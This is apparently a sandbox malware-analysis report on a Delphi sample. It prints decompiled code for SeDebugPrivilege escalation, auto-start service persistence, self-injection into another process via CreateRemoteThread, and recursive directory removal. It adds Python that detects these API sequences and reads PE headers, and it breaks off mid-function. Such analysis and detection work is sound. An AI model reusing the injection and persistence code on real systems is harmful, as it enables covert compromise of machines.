                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?,00000000), ref: 2403C4D1
                                    • CloseHandle.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?), ref: 2403C4DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Token$AdjustPrivilegesProcess$CloseCurrentHandleLookupOpenPrivilegeValueVersion
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 3222167619-2896544425
                                    • Opcode ID: 16bedd5ea4ee261e15105d6e64dc6c810e6a1000a1a3c6b406681dba4d588530
                                    • Instruction ID: ef2608eea441c924704e64c8cd83490a832fdc21d92cac562fa7b4a9731b7c2e
                                    • Opcode Fuzzy Hash: 16bedd5ea4ee261e15105d6e64dc6c810e6a1000a1a3c6b406681dba4d588530
                                    • Instruction Fuzzy Hash: 372133B2A04208BEFB10CBE5DD85FEFBFFCEB05704F504465E608E6184D6755A848BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E2403CBE4(char* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				void* _t32;
                                    				void* _t50;
                                    				intOrPtr _t59;
                                    				intOrPtr _t67;
                                    				char* _t71;
                                    				intOrPtr _t73;
                                    				intOrPtr _t74;
                                    
                                    				_t73 = _t74;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t71 = __eax;
                                    				E24013524(_v12);
                                    				_push(_t73);
                                    				_push(0x2403cd0f);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t74;
                                    				_v16 = 0;
                                    				E2403C424(); // enable SeDebugPrivilege first (function above)
                                    				_t50 = OpenSCManagerA(0, 0, 0xf003f); // 0xF003F = SC_MANAGER_ALL_ACCESS; fails without an elevated token
                                    				_t76 = _t50;
                                    				if(_t50 != 0) {
                                    					_push(_t73); // nested try/finally frame
                                    					_push(0x2403ccd4);
                                    					_push( *[fs:edx]);
                                    					 *[fs:edx] = _t74;
                                    					// lpServiceName = lpDisplayName = _t71; 0xF01FF = SERVICE_ALL_ACCESS;
                                    					// 0x110 = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS; 2 = SERVICE_AUTO_START;
                                    					// 0 = SERVICE_ERROR_IGNORE; lpBinaryPathName = _v12 (Delphi string converted to PChar by E24013534)
                                    					_t32 = CreateServiceA(_t50, _t71, _t71, 0xf01ff, 0x110, 2, 0, E24013534(_v12), 0, 0, 0, 0, 0);
                                    					E24013274( &_v20, _v8); // E24013274 / E24013388 are the Delphi string assign / concat helpers
                                    					E24013274( &_v32, _t71);
                                    					E24013388( &_v28, _v32, "System\\CurrentControlSet\\Services\\"); // builds System\CurrentControlSet\Services\<service name>
                                    					E24013274( &_v24, E24013534(_v28));
                                    					E24016858(0x80000002, _t50, "Description", _v24, _t71, _t76, _v20); // 0x80000002 = HKEY_LOCAL_MACHINE: writes the service's "Description" value (RegCreateKey/RegSetValueEx, see subcall list)
                                    					CloseServiceHandle(_t32);
                                    					CloseServiceHandle(_t50);
                                    					_pop(_t67);
                                    					 *[fs:eax] = _t67;
                                    					_v16 = 0xffffffff;
                                    				}
                                    				_pop(_t59);
                                    				 *[fs:eax] = _t59;
                                    				_push(0x2403cd16);
                                    				E240130AC( &_v32, 4);
                                    				return E24013088( &_v12);
                                    			}

                                    APIs
                                      • Part of subcall function 2403C424: GetVersionExA.KERNEL32(?), ref: 2403C441
                                      • Part of subcall function 2403C424: GetCurrentProcess.KERNEL32(00000020,?,00000000,2403C4E9,?,?), ref: 2403C467
                                      • Part of subcall function 2403C424: OpenProcessToken.ADVAPI32(00000000,00000020,?,00000000,2403C4E9,?,?), ref: 2403C46D
                                      • Part of subcall function 2403C424: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 2403C480
                                      • Part of subcall function 2403C424: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?,00000000,00000020,?,00000000,2403C4E9,?,?), ref: 2403C4AA
                                      • Part of subcall function 2403C424: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?,00000000), ref: 2403C4D1
                                      • Part of subcall function 2403C424: CloseHandle.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?), ref: 2403C4DA
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,2403CD0F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2403CC29
                                    • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000110,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,2403CCD4), ref: 2403CC6A
                                      • Part of subcall function 24016858: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 2401689E
                                      • Part of subcall function 24016858: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168C6
                                      • Part of subcall function 24016858: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168D5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,000F01FF,00000110,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2403CCBF
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,?,00000000,?,?,000F01FF,00000110,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2403CCC5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Close$HandleServiceToken$AdjustCreateOpenPrivilegesProcessValue$CurrentLookupManagerPrivilegeVersion
                                    • String ID: Description$System\CurrentControlSet\Services\
                                    • API String ID: 3877902884-3489731058
                                    • Opcode ID: 27c5136e045811c0f98c276f7e750356051cc7a871b4ed16b06484aabe983248
                                    • Instruction ID: 35baf9f97d1956f7fef9af1c6c2d0b21c0a37ab9bda884b1031cb616d047968a
                                    • Opcode Fuzzy Hash: 27c5136e045811c0f98c276f7e750356051cc7a871b4ed16b06484aabe983248
                                    • Instruction Fuzzy Hash: 9721A271A04209ABFF01DBA1CC51FAEBFB8EB55B44F108465F504E7298DA749AC1CA64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E2403C858(char __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				char* _v20;
                                    				char* _v44;
                                    				struct _SERVICE_STATUS _v48;
                                    				void* _t25;
                                    				void* _t34;
                                    				void* _t36;
                                    				void* _t46;
                                    				intOrPtr _t52;
                                    				signed int _t54;
                                    				void* _t56;
                                    				void* _t61;
                                    
                                    				_v16 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				_t58 = _a4;
                                    				E24013524(_v8);
                                    				_push(_t61);
                                    				_push(0x2403c93e);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t61 + 0xffffffd4;
                                    				E24013088(_a4);
                                    				_v44 = 0;
                                    				_v20 = 0;
                                    				_t25 = OpenSCManagerA(0, 0, 0xf003f); // SC_MANAGER_ALL_ACCESS
                                    				_t46 = _t25;
                                    				if(_t46 > 0) {
                                    					asm("sbb eax, eax"); // decompiler lost the boolean tested here (a caller-supplied stop/start flag)
                                    					if(_t25 + 1 != 1) {
                                    						_t54 = 0x20; // SERVICE_STOP
                                    					} else {
                                    						_t54 = 0x10; // SERVICE_START
                                    					}
                                    					_t34 = OpenServiceA(_t46, E24013534(_v8), _t54 | 0x00000004); // _v8 = service name; | SERVICE_QUERY_STATUS
                                    					_t56 = _t34;
                                    					if(_t56 > 0) {
                                    						asm("sbb eax, eax");
                                    						_t36 = _t34 + 1;
                                    						if(_t36 == 1) {
                                    							asm("sbb eax, eax");
                                    							if(_t36 + 1 != 1) {
                                    								ControlService(_t56, 1,  &_v48); // 1 = SERVICE_CONTROL_STOP
                                    							} else {
                                    								StartServiceA(_t56, 0,  &_v20); // no start arguments
                                    							}
                                    						}
                                    						QueryServiceStatus(_t56,  &_v48); // status read into _v48 but not acted on here
                                    						CloseServiceHandle(_t56);
                                    					}
                                    					CloseServiceHandle(_t46);
                                    				}
                                    				}
                                    				E2403C7A8(_v44, _t58);
                                    				_pop(_t52);
                                    				 *[fs:eax] = _t52;
                                    				_push(0x2403c945);
                                    				return E24013088( &_v8);
                                    			}

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C89D
                                    • OpenServiceA.ADVAPI32(00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C8CD
                                    • StartServiceA.ADVAPI32(00000000,00000000,?,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C8F5
                                    • ControlService.ADVAPI32(00000000,00000001,?,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C903
                                    • QueryServiceStatus.ADVAPI32(00000000,?,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C90D
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,?,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C913
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C919
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandleOpen$ControlManagerQueryStartStatus
                                    • String ID:
                                    • API String ID: 1698138069-0
                                    • Opcode ID: f9da81692bd7f285b234d7db9ed7a73cf46160bdadc886a8ae52b637bd45b1e9
                                    • Instruction ID: cb3caa9afefb471f7513133a4c9a35564aa214a0e4463a39af8505232a5b0747
                                    • Opcode Fuzzy Hash: f9da81692bd7f285b234d7db9ed7a73cf46160bdadc886a8ae52b637bd45b1e9
                                    • Instruction Fuzzy Hash: EE218173E08248AEFB01DB788C44BAE7FFC9B69A18F114476E404E3244D6749AC28A64
                                    Uniqueness

                                    Uniqueness Score: -1.00%
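In the sandbox trace the three functions above (E2403C424, E2403CBE4, E2403C858) appear as short ordered API sequences: OpenProcessToken with TOKEN_ADJUST_PRIVILEGES, LookupPrivilegeValueA("SeDebugPrivilege") and AdjustTokenPrivileges; OpenSCManagerA followed by CreateServiceA with start type SERVICE_AUTO_START; OpenServiceA followed by ControlService(SERVICE_CONTROL_STOP). The Python below is an added example and is not part of this report or of the sample: it parses lines written in the shape of the APIs listings above (the sample trace is constructed, with argument values copied from those listings), matches each rule as an ordered subsequence with argument checks, and decodes the CreateServiceA type and start flags. The rule names are this example's own; the fourth rule, the VirtualAllocEx/WriteProcessMemory/CreateRemoteThread injection sequence, is included as a general rule that the sample trace here does not exercise.

```python
import re
from collections import namedtuple

# Constructed sample trace in the shape of the APIs listings above
# (API.MODULE(args), ref: address); argument values mirror those listings.
SAMPLE_TRACE = """
• Part of subcall function 2403C424: GetVersionExA.KERNEL32(?), ref: 2403C441
• OpenProcessToken.ADVAPI32(00000000,00000020,?,00000000,2403C4E9,?,?), ref: 2403C46D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 2403C480
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,?), ref: 2403C4AA
• CloseHandle.KERNEL32(?), ref: 2403C4DA
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 2403CC29
• CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000110,00000002,00000000), ref: 2403CC6A
• CloseServiceHandle.ADVAPI32(00000000), ref: 2403CCBF
"""

# One listing line: optional bullet / "Part of subcall function X:" prefix,
# then API.MODULE(args), ref: address.
LINE_RE = re.compile(
    r"^\W*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Windows constants the rules compare against.
TOKEN_ADJUST_PRIVILEGES = 0x0020
SERVICE_WIN32_OWN_PROCESS = 0x0010
SERVICE_INTERACTIVE_PROCESS = 0x0100
SERVICE_AUTO_START = 2
SERVICE_CONTROL_STOP = 1
PAGE_EXECUTE_READWRITE = 0x40

Call = namedtuple("Call", "api module args ref")

def parse_trace(text):
    """Turn listing lines into Call records; lines that do not match are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            args = [a.strip() for a in m["args"].split(",")]
            calls.append(Call(m["api"], m["mod"], args, m["ref"]))
    return calls

def arg_int(call, i):
    """Argument i as an int, or None when it is missing or recorded as '?'."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None

# Each rule: ordered (API name, predicate on the Call) steps; all must match in order.
RULES = {
    "enable_SeDebugPrivilege": [
        ("OpenProcessToken", lambda c: bool((arg_int(c, 1) or 0) & TOKEN_ADJUST_PRIVILEGES)),
        ("LookupPrivilegeValueA", lambda c: c.args[1:2] == ["SeDebugPrivilege"]),
        ("AdjustTokenPrivileges", lambda c: True),
    ],
    "service_persistence": [
        ("OpenSCManagerA", lambda c: True),
        ("CreateServiceA", lambda c: arg_int(c, 5) == SERVICE_AUTO_START),
    ],
    "service_stop": [
        ("OpenServiceA", lambda c: True),
        ("ControlService", lambda c: arg_int(c, 1) == SERVICE_CONTROL_STOP),
    ],
    "remote_thread_injection": [
        ("VirtualAllocEx", lambda c: arg_int(c, 4) == PAGE_EXECUTE_READWRITE),
        ("WriteProcessMemory", lambda c: True),
        ("CreateRemoteThread", lambda c: True),
    ],
}

def match_in_order(calls, steps):
    """Greedy ordered-subsequence match; returns the matched calls or None."""
    pos, matched = 0, []
    for api, check in steps:
        while pos < len(calls) and not (calls[pos].api == api and check(calls[pos])):
            pos += 1
        if pos == len(calls):
            return None
        matched.append(calls[pos])
        pos += 1
    return matched

def classify(text):
    """Map each matched rule name to the ref addresses of the calls it matched."""
    calls = parse_trace(text)
    hits = {}
    for name, steps in RULES.items():
        matched = match_in_order(calls, steps)
        if matched:
            hits[name] = [c.ref for c in matched]
    return hits

def service_details(text):
    """Decode dwServiceType / dwStartType of the first CreateServiceA in the trace."""
    for c in parse_trace(text):
        if c.api == "CreateServiceA":
            stype = arg_int(c, 4) or 0
            return {
                "own_process": bool(stype & SERVICE_WIN32_OWN_PROCESS),
                "interactive": bool(stype & SERVICE_INTERACTIVE_PROCESS),
                "auto_start": arg_int(c, 5) == SERVICE_AUTO_START,
            }
    return None
```

classify(SAMPLE_TRACE) reports the privilege and service-persistence rules with the ref addresses of the matched calls; service_details(SAMPLE_TRACE) shows the service is created as an interactive own-process service with automatic start. The match is greedy and ordered, so a rule only fires when its calls occur in the sequence the code above issues them; arguments the sandbox recorded as "?" are treated as unknown rather than as a match.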

                                    C-Code - Quality: 76%
                                    			E2403B354(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
                                    				long _v20;
                                    				long _v24;
                                    				intOrPtr _v28;
                                    				void* _v32;
                                    				_Unknown_base(*)()* _v36;
                                    				void* _t18;
                                    				void* _t30;
                                    				struct HINSTANCE__* _t32;
                                    				void* _t35;
                                    				long _t36;
                                    				void* _t37;
                                    
                                    				_v32 = __ecx; // parameter for the remote thread
                                    				_v36 = __edx; // start routine for the remote thread (an address inside this image)
                                    				_t30 = __eax; // handle to the target process
                                    				_v28 = 0;
                                    				_t32 = GetModuleHandleA(0); // base of the injecting module's own image
                                    				_push(0);
                                    				_push(_t32);
                                    				asm("cdq");
                                    				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20; // base + e_lfanew -> IMAGE_NT_HEADERS (the 64-bit add below is decompiler noise)
                                    				asm("adc edx, [esp+0x4]");
                                    				_t36 =  *(_t18 + 0x50); // OptionalHeader.SizeOfImage (fixed PE32 offset)
                                    				_t35 =  *(_t18 + 0x34); // OptionalHeader.ImageBase (fixed PE32 offset)
                                    				VirtualFreeEx(_t30, _t35, 0, 0x8000); // 0x8000 = MEM_RELEASE: clear whatever the target has at our ImageBase
                                    				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40); // MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE, at the same base
                                    				if(_t37 != 0) {
                                    					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24); // copy the whole in-memory image; same base, so no relocation is needed
                                    					if(_t36 <= _v24) { // every byte written?
                                    						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20); // start routine address is valid in the target because the image sits at the same base
                                    						CloseHandle(_t30);
                                    						_v32 = _t37;
                                    					}
                                    				}
                                    				return _v28; // _v28 is set to 0 above and never updated in this listing
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 2403B36C
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 2403B396
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 2403B3A5
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 2403B3B8
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 2403B3C0
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 2403B3E1
                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 2403B3E7
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 320e831d3db3fd37a1909f490eb8679622ef688ad2e82d5ecf3d3b5ad779abdd
                                    • Instruction ID: 5da01fb4cc0ee853a39ee712e9e2dc1a7c9e349c9e2eeb6cd5e77aedc82156c2
                                    • Opcode Fuzzy Hash: 320e831d3db3fd37a1909f490eb8679622ef688ad2e82d5ecf3d3b5ad779abdd
                                    • Instruction Fuzzy Hash: 51111CB16483047FE350DA698C81F6FBBECDBC5758F548828B64CDB281D670E84487A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%
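E2403B354 takes two fields from its own PE header through fixed offsets: e_lfanew at 0x3c, then ImageBase at NT+0x34 and SizeOfImage at NT+0x50. It frees and re-allocates exactly that range in the target with PAGE_EXECUTE_READWRITE, copies the whole mapped image into it and starts a thread at an address inside the image, which works without relocation only because the copy lands at the same base. Those two offsets are right for a PE32 optional header (magic 0x10B) and wrong for PE32+ (magic 0x20B), where ImageBase is a 64-bit field at NT+0x30 and the dword at NT+0x34 is its upper half. The Python below is an added example, not the sample's code: it builds a constructed minimal PE32 and PE32+ header, reads the fields the way E2403B354 does, and beside it shows the signature- and magic-checked read an analyst's own tooling should use. The image base 0x24010000 is the dump offset given above; the SizeOfImage value 0x5B000 and the remaining header fields are made up.

```python
import struct

IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B  # PE32
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B  # PE32+

def build_pe_header(image_base, size_of_image, pe32plus=False):
    """Constructed minimal header for this example (not a loadable image):
    64-byte DOS header with e_lfanew = 0x40, then 'PE\\0\\0', a 20-byte file
    header and an optional header in which only the fields read below are set."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)   # e_lfanew lives at 0x3c
    opt_size = 0xF0 if pe32plus else 0xE0
    file_hdr = struct.pack("<HHIIIHH",
                           0x8664 if pe32plus else 0x14C,  # Machine
                           0, 0, 0, 0,                     # sections, timestamp, symbol table, symbol count
                           opt_size,                       # SizeOfOptionalHeader
                           0x0002)                         # IMAGE_FILE_EXECUTABLE_IMAGE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0,
                     IMAGE_NT_OPTIONAL_HDR64_MAGIC if pe32plus else IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    if pe32plus:
        struct.pack_into("<Q", opt, 0x18, image_base)      # 64-bit ImageBase; PE32+ has no BaseOfData
    else:
        struct.pack_into("<I", opt, 0x1C, image_base)      # 32-bit ImageBase
    struct.pack_into("<I", opt, 0x38, size_of_image)       # SizeOfImage sits at the same place in both
    return dos + b"PE\x00\x00" + file_hdr + bytes(opt)

def naive_image_geometry(image):
    """What E2403B354 does: e_lfanew at 0x3c, then NT+0x34 and NT+0x50 read
    as dwords with no signature or magic check. Returns (ImageBase, SizeOfImage)."""
    nt = struct.unpack_from("<I", image, 0x3C)[0]
    image_base = struct.unpack_from("<I", image, nt + 0x34)[0]
    size_of_image = struct.unpack_from("<I", image, nt + 0x50)[0]
    return image_base, size_of_image

def checked_image_geometry(image):
    """Validated read: MZ and PE signatures, then branch on the optional-header
    magic. Returns (magic, ImageBase, SizeOfImage)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    nt = struct.unpack_from("<I", image, 0x3C)[0]
    if image[nt:nt + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    opt = nt + 0x18                                        # optional header follows the 20-byte file header
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        image_base = struct.unpack_from("<I", image, opt + 0x1C)[0]   # == NT+0x34
    elif magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC:
        image_base = struct.unpack_from("<Q", image, opt + 0x18)[0]   # == NT+0x30, 8 bytes
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    size_of_image = struct.unpack_from("<I", image, opt + 0x38)[0]    # == NT+0x50
    return magic, image_base, size_of_image

# Constructed inputs: the base is the dump offset of this module, the size is made up.
PE32_SAMPLE = build_pe_header(0x24010000, 0x5B000)
PE32PLUS_SAMPLE = build_pe_header(0x140000000, 0x5B000, pe32plus=True)
```

On the PE32 header both readers agree (ImageBase 0x24010000, SizeOfImage 0x5B000). On the PE32+ header the naive read returns an ImageBase of 1, the upper dword of 0x140000000, while the checked read returns the full 64-bit value; an injector built on the fixed offsets would allocate at a nonsense address in that case. The sample itself is a 32-bit Delphi image, so the fixed offsets hold for it.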

                                    C-Code - Quality: 84%
                                    			E24015FE4(char __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v332;
                                    				char _v336;
                                    				char _v340;
                                    				char _v344;
                                    				int _t55;
                                    				signed char _t63;
                                    				void* _t64;
                                    				intOrPtr _t92;
                                    				struct _WIN32_FIND_DATAA* _t103;
                                    				void* _t105;
                                    				void* _t108;
                                    				void* _t112;
                                    
                                    				_v344 = 0;
                                    				_v340 = 0;
                                    				_v336 = 0;
                                    				_v12 = 0;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_t103 =  &_v332;
                                    				_push(_t108);
                                    				_push(0x24016160);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t108 + 0xfffffeac;
                                    				if( *((char*)(_v8 + E2401333C(_v8) - 1)) != 0x5c) { // 0x5c = '\': make sure the path ends with a backslash (E2401333C = string length)
                                    					E24013344( &_v8, 0x24016178);
                                    				}
                                    				E24013388( &_v336, 0x24016184, _v8); // path + search pattern (the string at 0x24016184 is not shown in this dump)
                                    				_t105 = FindFirstFileA(E24013534(_v336), _t103);
                                    				_t112 = _t105 - 0xffffffff;
                                    				if(_t112 == 0) { // INVALID_HANDLE_VALUE: nothing to enumerate
                                    					L15:
                                    					_pop(_t92);
                                    					 *[fs:eax] = _t92;
                                    					_push(E24016167);
                                    					E240130AC( &_v344, 3);
                                    					return E240130AC( &_v12, 2);
                                    				} else {
                                    					goto L3;
                                    				}
                                    				do {
                                    					L3:
                                    					E240132EC( &_v12, 0x104,  &(_t103->cFileName)); // 0x104 = MAX_PATH
                                    					E24013480(_v12, 0x24016190); // string compare; the decompiler reuses _t112 for its flag result
                                    					if(_t112 != 0) {
                                    						E24013480(_v12, 0x2401619c); // the two compared strings are not in this dump; this is the usual "." / ".." skip
                                    						if(_t112 != 0) {
                                    							_t63 = _t103->dwFileAttributes;
                                    							if(_t63 == 0xffffffff || (_t63 & 0x00000010) == 0) { // INVALID_FILE_ATTRIBUTES, FILE_ATTRIBUTE_DIRECTORY
                                    								_t64 = 0;
                                    							} else {
                                    								_t64 = 1;
                                    							}
                                    							_t115 = _t64;
                                    							if(_t64 != 0) {
                                    								E24013388( &_v344, _v12, _v8);
                                    								E24015FE4(_v344, 0, _v12, _t103, _t105, __eflags); // recurse into the subdirectory
                                    							} else {
                                    								E24013388( &_v12, _v12, _v8);
                                    								E24013274( &_v340, E24013534(_v12));
                                    								E24016634(_v340, 0, _t103, _t105, _t115); // per-file action on the full path (body not in this dump)
                                    							}
                                    						}
                                    					}
                                    					_t55 = FindNextFileA(_t105, _t103);
                                    					asm("sbb eax, eax");
                                    				} while (_t55 + 1 != 0);
                                    				FindClose(_t105);
                                    				if(RemoveDirectoryA(E24013534(_v8)) != 0) { // remove the directory itself (only succeeds once empty); result unused
                                    				}
                                    				goto L15;
                                    			}

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24016160), ref: 24016067
                                    • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,24016160), ref: 24016108
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,24016160), ref: 2401611C
                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,24016160), ref: 2401612A
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Find$File$CloseDirectoryFirstNextRemove
                                    • String ID: *.*
                                    • API String ID: 81111410-438819550
                                    • Opcode ID: 6323b605bcf80f6985238b1abac504bf5e6c6c4482b9498271f4d518d36f0dc1
                                    • Instruction ID: a34b0ba2823b59bfced8c29e0b8265e5a5a036338dc48255de7d28aa505c2931
                                    • Opcode Fuzzy Hash: 6323b605bcf80f6985238b1abac504bf5e6c6c4482b9498271f4d518d36f0dc1
                                    • Instruction Fuzzy Hash: 6C416E34900618ABEF11DBE4CD80ADEBBF4AF95758F5049E4D40CA7368DB70AFC58A50
                                    Uniqueness
                                    • Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E24015FE2(char __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v332;
                                    				char _v336;
                                    				char _v340;
                                    				char _v344;
                                    				int _t55;
                                    				signed char _t63;
                                    				void* _t64;
                                    				intOrPtr _t91;
                                    				struct _WIN32_FIND_DATAA* _t102;
                                    				void* _t104;
                                    				void* _t107;
                                    				void* _t111;
                                    
                                    				_v344 = 0;
                                    				_v340 = 0;
                                    				_v336 = 0;
                                    				_v12 = 0;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_t102 =  &_v332;
                                    				_push(_t107);
                                    				_push(0x24016160);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t107 + 0xfffffeac;
                                    				if( *((char*)(_v8 + E2401333C(_v8) - 1)) != 0x5c) {
                                    					E24013344( &_v8, 0x24016178);
                                    				}
                                    				E24013388( &_v336, 0x24016184, _v8);
                                    				_t104 = FindFirstFileA(E24013534(_v336), _t102);
                                    				_t111 = _t104 - 0xffffffff;
                                    				if(_t111 == 0) {
                                    					L16:
                                    					_pop(_t91);
                                    					 *[fs:eax] = _t91;
                                    					_push(E24016167);
                                    					E240130AC( &_v344, 3);
                                    					return E240130AC( &_v12, 2);
